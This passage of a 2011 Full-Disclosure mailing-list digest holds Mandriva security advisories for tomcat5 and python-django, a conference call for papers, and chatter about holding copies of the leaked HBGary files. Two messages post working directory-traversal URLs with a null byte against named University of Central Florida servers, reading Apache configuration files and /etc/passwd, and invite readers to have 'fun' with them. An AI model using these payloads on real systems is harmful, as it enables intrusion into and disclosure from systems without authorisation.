> >   3151ab51c99456cf46095557b421a47d
>  2009.0/x86_64/tomcat5-admin-webapps-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   4312fccb593f577b34a77363c140460b
>  2009.0/x86_64/tomcat5-common-lib-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   04580ac069d37ea7ce1223f744dd63bf
>  2009.0/x86_64/tomcat5-jasper-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   adf6a50a74e425cd579d4c76fe518f88
>  2009.0/x86_64/tomcat5-jasper-eclipse-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   be1cdc23f0f7a115835062c6dd22f68e
>  2009.0/x86_64/tomcat5-jasper-javadoc-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   827ce79fb2c78c7cd5e2b9ed74e60564
>  2009.0/x86_64/tomcat5-jsp-2.0-api-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   5ad827a665ee9a6b20d1e771ada0922a
>  2009.0/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   1133aad0b9a2715bbea40e925f065f0e
>  2009.0/x86_64/tomcat5-server-lib-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   734a3311954704b8d31c134c204273f3
>  2009.0/x86_64/tomcat5-servlet-2.4-api-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   e61e4817d3fe00bca326b7d078d38cc1
>  
> 2009.0/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   4f37e8f46d3435971ad107d3012c2722
>  2009.0/x86_64/tomcat5-webapps-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   78f469b9bdf9461e9dd423fa51a00fbb
>  2009.0/SRPMS/tomcat5-5.5.27-0.3.0.4mdv2009.0.src.rpm
> >
> >   Mandriva Linux 2010.0:
> >   39e1b0164f00a89b96865243916eccb6
>  2010.0/i586/tomcat5-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   b406cccf6e7886b5c47de22ecc82088d
>  2010.0/i586/tomcat5-admin-webapps-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   b5c3e735cec844c1a7c1206c78a6af51
>  2010.0/i586/tomcat5-common-lib-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   0561c5ba6f593f8cb21d6433b31bbdf0
>  2010.0/i586/tomcat5-jasper-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   c3d3ed8727164b1542b08cc35b74eeb3
>  2010.0/i586/tomcat5-jasper-eclipse-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   137b051b6fa4a159098151aed959d4b8
>  2010.0/i586/tomcat5-jasper-javadoc-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   fb2d81779b9a6701f935b69c72dfd1a2
>  2010.0/i586/tomcat5-jsp-2.0-api-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   247083e1e461555c064c57fb22293eb4
>  2010.0/i586/tomcat5-jsp-2.0-api-javadoc-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   1eb783fc2a5fd77fc04327f103f3e924
>  2010.0/i586/tomcat5-server-lib-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   ff93f3807ad38a6f3efd3b755e4b8a9c
>  2010.0/i586/tomcat5-servlet-2.4-api-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   63293aef2e275ccf3c5dca5ab69b1a5b
>  
> 2010.0/i586/tomcat5-servlet-2.4-api-javadoc-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   5295cf4e876b552468657fd61eff83af
>  2010.0/i586/tomcat5-webapps-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   3e8072e942561408d7c33bd24517b4c9
>  2010.0/SRPMS/tomcat5-5.5.27-0.5.0.2mdv2010.0.src.rpm
> >
> >   Mandriva Linux 2010.0/X86_64:
> >   c4999736e1bc0c9a5a97d594cee65c1c
>  2010.0/x86_64/tomcat5-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   6b1e3d535d54b0be9e2ae5d1097ccada
>  2010.0/x86_64/tomcat5-admin-webapps-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   8b312a00888405017f0a569a941ef886
>  2010.0/x86_64/tomcat5-common-lib-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   2418f2e08935a6f0992b092a4bffecc8
>  2010.0/x86_64/tomcat5-jasper-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   83a682d9a8f037101b9551cd78a016c6
>  2010.0/x86_64/tomcat5-jasper-eclipse-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   bb1adfd0118f39da9a5b3f65ae84e62f
>  2010.0/x86_64/tomcat5-jasper-javadoc-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   4a98e6b4fc7d0f857fc992b939d842ad
>  2010.0/x86_64/tomcat5-jsp-2.0-api-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   4037dc8df08254a5c8e93313221a7514
>  2010.0/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   1c1a706e810c6cd0c063d84b0522585a
>  2010.0/x86_64/tomcat5-server-lib-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   62bc24195dda4032d33bb206031bd037
>  2010.0/x86_64/tomcat5-servlet-2.4-api-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   c3bb0d7222dbc10f3d14a95ca8a79644
>  
> 2010.0/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   a300b02d11c66be9c4b7025a16db508d
>  2010.0/x86_64/tomcat5-webapps-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> >   3e8072e942561408d7c33bd24517b4c9
>  2010.0/SRPMS/tomcat5-5.5.27-0.5.0.2mdv2010.0.src.rpm
> >
> >   Mandriva Linux 2010.1:
> >   5bdb48aeda19057db32a64589eacd82a
>  2010.1/i586/tomcat5-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   96ecbc6c012122bf2e11e500c6402205
>  2010.1/i586/tomcat5-admin-webapps-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   a176c1651cc2d08ed8510c01622d5176
>  2010.1/i586/tomcat5-common-lib-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   9240df47c808e342c5bc6dcd910d85f5
>  2010.1/i586/tomcat5-jasper-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   6f46c2c619ec79ec43783efcf7e908c2
>  2010.1/i586/tomcat5-jasper-eclipse-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   133a8b24ec4aa7662c0145ff5303beca
>  2010.1/i586/tomcat5-jasper-javadoc-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   97eaf631f481c6431c7439755e33fde5
>  2010.1/i586/tomcat5-jsp-2.0-api-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   794935023c7630d13a887b474b78bb7e
>  2010.1/i586/tomcat5-jsp-2.0-api-javadoc-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   ce72eb40ddf157064e8926eb58e2740b
>  2010.1/i586/tomcat5-server-lib-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   84f3460a32131aef7f663ea2c5981859
>  2010.1/i586/tomcat5-servlet-2.4-api-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   f04fe3121f8b1cf579f0cc92099c364a
>  
> 2010.1/i586/tomcat5-servlet-2.4-api-javadoc-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   ec6163a7e1ee720c01f86b7070ae1a5d
>  2010.1/i586/tomcat5-webapps-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   e480656f0abde41f97e478151a7fc71f
>  2010.1/SRPMS/tomcat5-5.5.28-0.5.0.2mdv2010.2.src.rpm
> >
> >   Mandriva Linux 2010.1/X86_64:
> >   405ff9248913717a0249614e3ccdeff4
>  2010.1/x86_64/tomcat5-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   0500f420f913cac42c8c2398182e0b8d
>  2010.1/x86_64/tomcat5-admin-webapps-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   f796e84a6cf4dac452eaaec03b819c97
>  2010.1/x86_64/tomcat5-common-lib-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   3e25bb28dc6c08b2dcbd1a272d01eaec
>  2010.1/x86_64/tomcat5-jasper-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   07e577e2fbc57e40b944478449715240
>  2010.1/x86_64/tomcat5-jasper-eclipse-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   1e688aca310915303d257abaa0c55099
>  2010.1/x86_64/tomcat5-jasper-javadoc-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   631f812a7a32013ba301cecbeb23163d
>  2010.1/x86_64/tomcat5-jsp-2.0-api-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   5970e0221d6d5386f04316b6805c6bfc
>  2010.1/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   f64a8611f668cd19bafb0a8884c3b998
>  2010.1/x86_64/tomcat5-server-lib-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   ba19195b485e4468780f36010c5215b5
>  2010.1/x86_64/tomcat5-servlet-2.4-api-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   e241ad2d2ea43d6515b61a256fdbc61e
>  
> 2010.1/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   15718f212c8d29bdbaac81ab40afbd2a
>  2010.1/x86_64/tomcat5-webapps-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> >   e480656f0abde41f97e478151a7fc71f
>  2010.1/SRPMS/tomcat5-5.5.28-0.5.0.2mdv2010.2.src.rpm
> >
> >   Mandriva Enterprise Server 5:
> >   bd71ae4141fbf5a884cfbccc756c8329
>  mes5/i586/tomcat5-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   75b8764895d7b231901602dd0605f2e2
>  mes5/i586/tomcat5-admin-webapps-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   6c827ad66b01560b72c5a8c96616afaa
>  mes5/i586/tomcat5-common-lib-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   1a2155333c323146ef3e1fbdeae96035
>  mes5/i586/tomcat5-jasper-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   554ec541f6857a7946a6fae67c0a2fa6
>  mes5/i586/tomcat5-jasper-eclipse-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   10b54ca8ebefcd816bade65dae8e408b
>  mes5/i586/tomcat5-jasper-javadoc-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   8a12958fd3040ca0f4ce23bb7a3a1bdf
>  mes5/i586/tomcat5-jsp-2.0-api-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   320881d8a847077fc8a7d70d7d0e0a02
>  mes5/i586/tomcat5-jsp-2.0-api-javadoc-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   8ab623786a3479dc5e990b9949a13502
>  mes5/i586/tomcat5-server-lib-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   d4c53039181b378a3da1016c137ad843
>  mes5/i586/tomcat5-servlet-2.4-api-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   52922ac7e5b4c1a7356d5248cf264a1d
>  mes5/i586/tomcat5-servlet-2.4-api-javadoc-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   6cf03c3b0981031f6bf7b8710990bcb0
>  mes5/i586/tomcat5-webapps-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   a4f9e4804454f2d628865ad654d6a188
>  mes5/SRPMS/tomcat5-5.5.27-0.3.0.4mdvmes5.1.src.rpm
> >
> >   Mandriva Enterprise Server 5/X86_64:
> >   20eee581278206c28db4e304a6756671
>  mes5/x86_64/tomcat5-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   d6b1d88885c03c36a84dd7703bb82bbb
>  mes5/x86_64/tomcat5-admin-webapps-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   a04900de513cbaf5359b41b1df0e9ff3
>  mes5/x86_64/tomcat5-common-lib-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   c58d2e125e9c2e4de256224d64cf1d46
>  mes5/x86_64/tomcat5-jasper-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   7612d8a28f5e008405a282ceb265a769
>  mes5/x86_64/tomcat5-jasper-eclipse-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   0796bfcd6e042c1128426bb47aae03d5
>  mes5/x86_64/tomcat5-jasper-javadoc-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   2ccd09878fd1f3ef8e4846864bd2f71e
>  mes5/x86_64/tomcat5-jsp-2.0-api-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   1b94570c1a5913fd0eefbcbee71afdc8
>  mes5/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   ca2608f81795ff805e34e7316799a6a7
>  mes5/x86_64/tomcat5-server-lib-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   37d677648216a2d5577db95f0ab9f194
>  mes5/x86_64/tomcat5-servlet-2.4-api-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   42077f152ee121ed61cda754200f8902
>  
> mes5/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   75657b92a4a6d94e27c3188653cad41e
>  mes5/x86_64/tomcat5-webapps-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> >   a4f9e4804454f2d628865ad654d6a188
>  mes5/SRPMS/tomcat5-5.5.27-0.3.0.4mdvmes5.1.src.rpm
> >   _______________________________________________________________________
> >
> >   To upgrade automatically use MandrivaUpdate or urpmi.  The verification
> >   of md5 checksums and GPG signatures is performed automatically for you.
> >
> >   All packages are signed by Mandriva for security.  You can obtain the
> >   GPG public key of the Mandriva Security Team by executing:
> >
> >    gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
> >
> >   You can view other update advisories for Mandriva Linux at:
> >
> >    http://www.mandriva.com/security/advisories
> >
> >   If you want to report vulnerabilities, please contact
> >
> >    security_(at)_mandriva.com
> >   _______________________________________________________________________
> >
> >   Type Bits/KeyID     Date       User ID
> >   pub  1024D/22458A98 2000-07-10 Mandriva Security Team
> >    <security*mandriva.com>
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.4.9 (GNU/Linux)
> >
> > iD8DBQFNXrAVmqjQ0CJFipgRAjIfAJ4yL+76n74D2G8gpFyNCGQ4s6+6GACglNTw
> > j0b0pCkznIMqccTMYR+zW5E=
> > =KGzB
> > -----END PGP SIGNATURE-----
> >
> >
> >
> > ------------------------------
> >
> > Message: 13
> > Date: Fri, 18 Feb 2011 22:28:03 +0100
> > From: Alejandro Cánovas Solbes<alejandro.canovas.cp46700@xxxxxxxxx>
> > Subject: [Full-disclosure] Deadline extension | MOBILITY 2011 || July
> >       17-22,  2011 - Bournemouth, UK
> > To: full-disclosure@xxxxxxxxxxxxxxxxx
> > Message-ID:<201102182128.p1ILS2L6027576@xxxxxxxxxxx>
> > Content-Type: text/plain; charset=us-ascii
> >
> >
> > INVITATION:
> >
> > =================
> > Please consider to contribute to and/or forward to the appropriate groups
> the following opportunity to submit and publish original scientific results.
> > =================
> >
> > ============== MOBILITY 2011 | Call for Papers ===============
> >
> > CALL FOR PAPERS, TUTORIALS, PANELS
> >
> > MOBILITY 2011: The First International Conference on Mobile Services,
> Resources, and Users
> > July 17-22, 2011 - Bournemouth, UK
> >
> > General page: http://www.iaria.org/conferences2011/MOBILITY11.html
> >
> > Call for Papers: http://www.iaria.org/conferences2011/CfPMOBILITY11.html
> >
> > Submission deadline: March 10, 2011
> >
> > Technical Co-Sponsors:
> > - The Bournemouth&  Poole College
> > - UNIK - University Graduate Center
> > - Bournemouth University
> > - Movation Collaboration Centre
> > - Center for Wireless Innovation, Norway
> > - INRIA
> > - PT Inovacao
> > - Cisco Systems, Inc.
> > Sponsored by IARIA, www.iaria.org
> >
> > Extended versions of selected papers will be published in IARIA Journals:
> http://www.iariajournals.org
> > Extended versions of selected papers on vehicular mobility will be
> published in a special issue of IJET Journal:
> > http://www.inderscience.com/browse/index.php?journalID=133
> >
> > Please note the Poster Forum and Work in Progress options.
> >
> > The topics suggested by the conference can be discussed in term of
> concepts, state of the art, research, standards, implementations, running
> experiments, applications, and industrial case studies. Authors are invited
> to submit complete unpublished papers, which are not under review in any
> other conference or journal in the following, but not limited to, topic
> areas.
> >
> > All tracks are open to both research and industry contributions, in terms
> of Regular papers, Posters, Work in progress, Technical/marketing/business
> presentations, Demos, Tutorials, and Panels.
> >
> > Before submission, please check and conform with the Editorial rules:
> http://www.iaria.org/editorialrules.html
> >
> > MOBILITY 2011 Topics (topics and submission details: see CfP on the site)
> >
> > Mobile architectures, mechanisms, protocols
> > Mobility and wireless; Mobility enabling protocols; Mobile software;
> Service composition in mobile environments; Knowledge and service discovery
> in mobile environments; On-demand mobility; User presence in mobile
> environments; Replication in mobile environments; Middleware for mobile
> environments; Internet and mobility; Software architecture for mobile
> applications
> >
> > Mobile networking and management
> > Fundamentals of mobile networks; Mobile-Fixed interworking; Heterogenous
> networks; Beyond IMT-A; Mobile network virtualization; Femtocells and
> relays; Mobile cells; Mobile network sharing and network access;
> Self-management of mobile networks; Mobility management; Access control in
> mobile environments; Advanced roaming concepts; Mobile network edge-based
> service delivery platforms; Mobile content delivery networks; Mobile
> peer-to-peer systems; Mobile VPNs; Quality of experience in mobile networks
> >
> > Mobile devices and services
> > Smart mobile devices; Embedded mobile; Sensors and mobiles; Mobile media,
> mobile content; Mobile applications (mobile learning, mobile healthcare,
> etc.); Mobile games; Mobile business; Mobile Web applications; Apps versus
> Web; Novel software concepts for mobile services; Mobile- and micro payment;
> mCommerce
> >
> > Mobile prosumers and interfaces
> > User interaction and mobility; Mobile communities; Mobile Web interfaces
> and interaction techniques; Implementations and experimental mobile systems;
> Mobile Web; Mobile search and advertising
> >
> > Mobile Internet of Things
> > Future mobile Internet; Internet of Things; Machine to Machine, People,
> Business (M2x); Online; Smart Homes; Smart Cities
> >
> > Vehicular mobile technology
> > Architectures and platforms; Vehicular ad hoc networks; Vehicular routing
> metrics and supporting protocols; Mobility management and topology control;
> Standardization of vehicular networks; User aspects; Business enablers
> >
> > Challenges in mobile environments
> > Security and privacy environments; Protection and safety of distributed
> mobile data; Context-aware mobility and privacy; Mobile emergency
> communication and public safety; Location-based services; Micro-payments;
> Accuracy and preciseness in localizing mobile entities
> >
> > ====================
> > MOBILITY General Chair
> > Josef Noll, University of Oslo&  Movation, Norway
> >
> > MOBILITY Advisory Committee
> > Petre Dini, Concordia University, Canada&  IARIA, USA
> > Pekka Jappinen. Lappeenranta University of Technology, Finland
> > Maode Ma, Nanyang Technological University, Singapore
> >
> > MOBILITY Industry Liaison Chairs
> > Filipe Cabral Pinto, Telecom Inovação S.A., Portugal
> > Xiang Song, Microsoft, USA
> > Xun Luo, Qualcomm Inc. - San Diego, USA
> >
> > MOBILITY Special Area Chairs on Video
> > Mikko Uitto, VTT Technical Research Centre of Finland, Finland
> >
> > MOBILITY Special Area Chairs on Mobile Wireless Networks
> > Mohammad Mushfiqur Chowdhury, University of Oslo, Norway
> > Masashi Sugano, Osaka Prefecture University, Japan
> >
> > MOBILITY Special Area Chairs on Mobile Web / Application
> > In-Young Ko, Korea Advanced Institute of Science and Technology (KAIST),
> Korea
> >
> > MOBILITY Special Area Chairs on Context-aware, Media, and Pervasive
> > Brent Lagesse, Oak Ridge National Laboratory, USA
> >
> > MOBILITY Special Area Chairs on Mobile Internet of Things and Mobile
> Collaborations
> > Jörn Franke, SAP Research Center - Sophia Antipolis, France
> > Nils Olav Skeie, University College Telemark, Norway
> >
> > MOBILITY Special Area Chairs on Vehicular Mobility
> > Gianluca Franchino, CEIICP - Scuola Superiore Sant'Anna - Pisa, Italy
> >
> > MOBILITY Special Area Chairs on Mobile Cloud Computing
> > Chunming Rong, University of Stavanger, Norway
> > Josef Noll, Center for Wireless Innovation, Norway
> >
> > MOBILITY Publicity Chairs
> > Aline Carneiro Viana, INRIA Saclay - Ile de France - Orsay, France
> > Sarfraz Alam, UNIK-University Graduate Center, Norway
> >
> > Committee: http://www.iaria.org/conferences2011/ComMOBILITY11.html
> > ============================
> >
> >
> >
> > ------------------------------
> >
> > Message: 14
> > Date: Fri, 18 Feb 2011 23:10:00 +0100
> > From: security@xxxxxxxxxxxx
> > Subject: [Full-disclosure] [ MDVSA-2011:031 ] python-django
> > To: full-disclosure@xxxxxxxxxxxxxxxxx
> > Message-ID:<E1PqYWW-0005jS-I9@xxxxxxxxxxxxxxxxxx>
> >
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> >   _______________________________________________________________________
> >
> >   Mandriva Linux Security Advisory                         MDVSA-2011:031
> >   http://www.mandriva.com/security/
> >   _______________________________________________________________________
> >
> >   Package : python-django
> >   Date    : February 18, 2011
> >   Affected: 2010.0, 2010.1
> >   _______________________________________________________________________
> >
> >   Problem Description:
> >
> >   Multiple vulnerabilities has been found and corrected in python-django:
> >
> >   Django 1.1.x before 1.1.4 and 1.2.x before 1.2.5 does not properly
> >   validate HTTP requests that contain an X-Requested-With header,
> >   which makes it easier for remote attackers to conduct cross-site
> >   request forgery (CSRF) attacks via forged AJAX requests that leverage
> >   a combination of browser plugins and redirects, a related issue to
> >   CVE-2011-0447 (CVE-2011-0696).
> >
> >   Cross-site scripting (XSS) vulnerability in Django 1.1.x before
> >   1.1.4 and 1.2.x before 1.2.5 might allow remote attackers to inject
> >   arbitrary web script or HTML via a filename associated with a file
> >   upload (CVE-2011-0697).
> >
> >   Directory traversal vulnerability in Django 1.1.x before 1.1.4 and
> >   1.2.x before 1.2.5 on Windows might allow remote attackers to read or
> >   execute files via a / (slash) character in a key in a session cookie,
> >   related to session replays (CVE-2011-0698).
> >
> >   The updated packages have been upgraded to the 1.1.4 version which
> >   is not vulnerable to these issues.
> >   _______________________________________________________________________
> >
> >   References:
> >
> >   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0696
> >   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0697
> >   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0698
> >   _______________________________________________________________________
> >
> >   Updated Packages:
> >
> >   Mandriva Linux 2010.0:
> >   202f769807a186f2d9197c9eda30faa6
>  2010.0/i586/python-django-1.1.4-0.1mdv2010.0.noarch.rpm
> >   ba04206d09a47c76d3e5b0e60dbad79f
>  2010.0/SRPMS/python-django-1.1.4-0.1mdv2010.0.src.rpm
> >
> >   Mandriva Linux 2010.0/X86_64:
> >   33eb96488eced9ae1d573bb6f2706058
>  2010.0/x86_64/python-django-1.1.4-0.1mdv2010.0.noarch.rpm
> >   ba04206d09a47c76d3e5b0e60dbad79f
>  2010.0/SRPMS/python-django-1.1.4-0.1mdv2010.0.src.rpm
> >
> >   Mandriva Linux 2010.1:
> >   3cfc441c4f75142c19416c6f6d22eb2d
>  2010.1/i586/python-django-1.1.4-0.1mdv2010.2.noarch.rpm
> >   4f628f112373a36feebb403daec0e646
>  2010.1/SRPMS/python-django-1.1.4-0.1mdv2010.2.src.rpm
> >
> >   Mandriva Linux 2010.1/X86_64:
> >   50a8a8aad7dd3001bee2560f8df1b156
>  2010.1/x86_64/python-django-1.1.4-0.1mdv2010.2.noarch.rpm
> >   4f628f112373a36feebb403daec0e646
>  2010.1/SRPMS/python-django-1.1.4-0.1mdv2010.2.src.rpm
> >   _______________________________________________________________________
> >
> >   To upgrade automatically use MandrivaUpdate or urpmi.  The verification
> >   of md5 checksums and GPG signatures is performed automatically for you.
> >
> >   All packages are signed by Mandriva for security.  You can obtain the
> >   GPG public key of the Mandriva Security Team by executing:
> >
> >    gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
> >
> >   You can view other update advisories for Mandriva Linux at:
> >
> >    http://www.mandriva.com/security/advisories
> >
> >   If you want to report vulnerabilities, please contact
> >
> >    security_(at)_mandriva.com
> >   _______________________________________________________________________
> >
> >   Type Bits/KeyID     Date       User ID
> >   pub  1024D/22458A98 2000-07-10 Mandriva Security Team
> >    <security*mandriva.com>
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.4.9 (GNU/Linux)
> >
> > iD8DBQFNXsGvmqjQ0CJFipgRAggbAKC6jBSLeNUZCFYKefNU6S5mo4G+QgCeLdLo
> > ksEbjuDpyvINyjhBj/kj17s=
> > =QCYL
> > -----END PGP SIGNATURE-----
> >
> >
> >
> > ------------------------------
> >
> > Message: 15
> > Date: Fri, 18 Feb 2011 23:17:00 +0100
> > From: Dani?l W. Crompton<daniel.crompton@xxxxxxxxx>
> > Subject: Re: [Full-disclosure] Fwd: HBGary Mirrors?
> > To: full-disclosure@xxxxxxxxxxxxxxxxx
> > Message-ID:
> >       <AANLkTinx9gtrCkOo1+6x61kq7fJoEtMyHw6PAyCw6LF0@xxxxxxxxxxxxxx>
> > Content-Type: text/plain; charset="iso-8859-1"
> >
> > On 18 February 2011 20:11, Cal Leeming [Simplicity Media Ltd]<
> > cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>  wrote:
> >
> >> I'm wondering along the same lines as Thor, based on intent. One of
> those
> >> "don't take the piss or the judge is gonna own you" scenarios that would
> be
> >> tested in court on a per trial basis. Like, if the files were known to
> >> contain encrypted info, and if it was proved that you knew the contents
> of
> >> those files, then you would be held liable.
> >
> > Unless you has actually decrypted the file you would not "know" what was
> in
> > the file, you would be relying on what the person who gave you the file
> told
> > you. I assume this would be some kind of hearsay, although a judge might
> > consider you an accessory after the fact or a (co-)conspirator which in
> some
> > cases might result in a higher sentence than the original crime.
> >
> > D.
> >
> >
> > blaze your trail
> >
> > --
> > Dani?l W. Crompton<daniel.crompton@xxxxxxxxx>
> >
> >   <http://specialbrands.net/>
> >
> > <http://specialbrands.net/>
> > http://specialbrands.net/
> > <http://twitter.com/webhat>
> > <http://www.facebook.com/webhat><http://plancast.com/webhat><
> http://www.linkedin.com/in/redhat>
> > -------------- next part --------------
> > An HTML attachment was scrubbed...
> > URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110218/8bdc0d1a/attachment-0001.html
> >
> > ------------------------------
> >
> > Message: 16
> > Date: Fri, 18 Feb 2011 13:28:21 -0500
> > From: William Warren<hescominsoon@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
> > Subject: Re: [Full-disclosure] HBGary Mirrors?
> > To: full-disclosure@xxxxxxxxxxxxxxxxx
> > Message-ID:<4D5EBA45.9090409@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
> > Content-Type: text/plain; charset=ISO-8859-1; format=flowed
> >
> > On 2/18/2011 11:24 AM, ck wrote:
> >> So, the FEDs shut down all mirrors of the HBGary files - or didn't they?
> >>
> >> ck
> >>
> >> _______________________________________________
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> > i've got a copy..:)
> >
> >
> >
> > ------------------------------
> >
> > Message: 17
> > Date: Sat, 19 Feb 2011 01:08:56 -0500
> > From: Hack Talk<hacktalkblog@xxxxxxxxx>
> > Subject: [Full-disclosure] University of Central Florida Multiple LFI
> > To: full-disclosure@xxxxxxxxxxxxxxxxx
> > Message-ID:
> >       <AANLkTi=oyDpNL6Jgu8Ms=btLaZdjUkvyhFxXLH8vDjj0@xxxxxxxxxxxxxx>
> > Content-Type: text/plain; charset="iso-8859-1"
> >
> > Found these and thought I'd share:
> >
> > -==================-
> >
> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
> >
> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
> > -==================-
> > Let me know if you do anything fun with 'em
> >
> > Luis Santana - Security+
> > Administrator - http://hacktalk.net
> > HackTalk Security - Security From The Underground
> > -------------- next part --------------
> > An HTML attachment was scrubbed...
> > URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110219/6916c766/attachment-0001.html
> >
> > ------------------------------
> >
> > Message: 18
> > Date: Sat, 19 Feb 2011 16:34:21 +0530
> > From: Madhur Ahuja<ahuja.madhur@xxxxxxxxx>
> > Subject: Re: [Full-disclosure] University of Central Florida Multiple
> >       LFI
> > To: Hack Talk<hacktalkblog@xxxxxxxxx>
> > Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> > Message-ID:
> >       <AANLkTimd5F1Kgw1uCO_UGgX3mVUiMuU9jaisp6K=SM-K@xxxxxxxxxxxxxx>
> > Content-Type: text/plain; charset="utf-8"
> >
> >
> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00
> >
> > On Sat, Feb 19, 2011 at 11:38 AM, Hack Talk<hacktalkblog@xxxxxxxxx>
>  wrote:
> >
> >> Found these and thought I'd share:
> >>
> >> -==================-
> >>
> >>
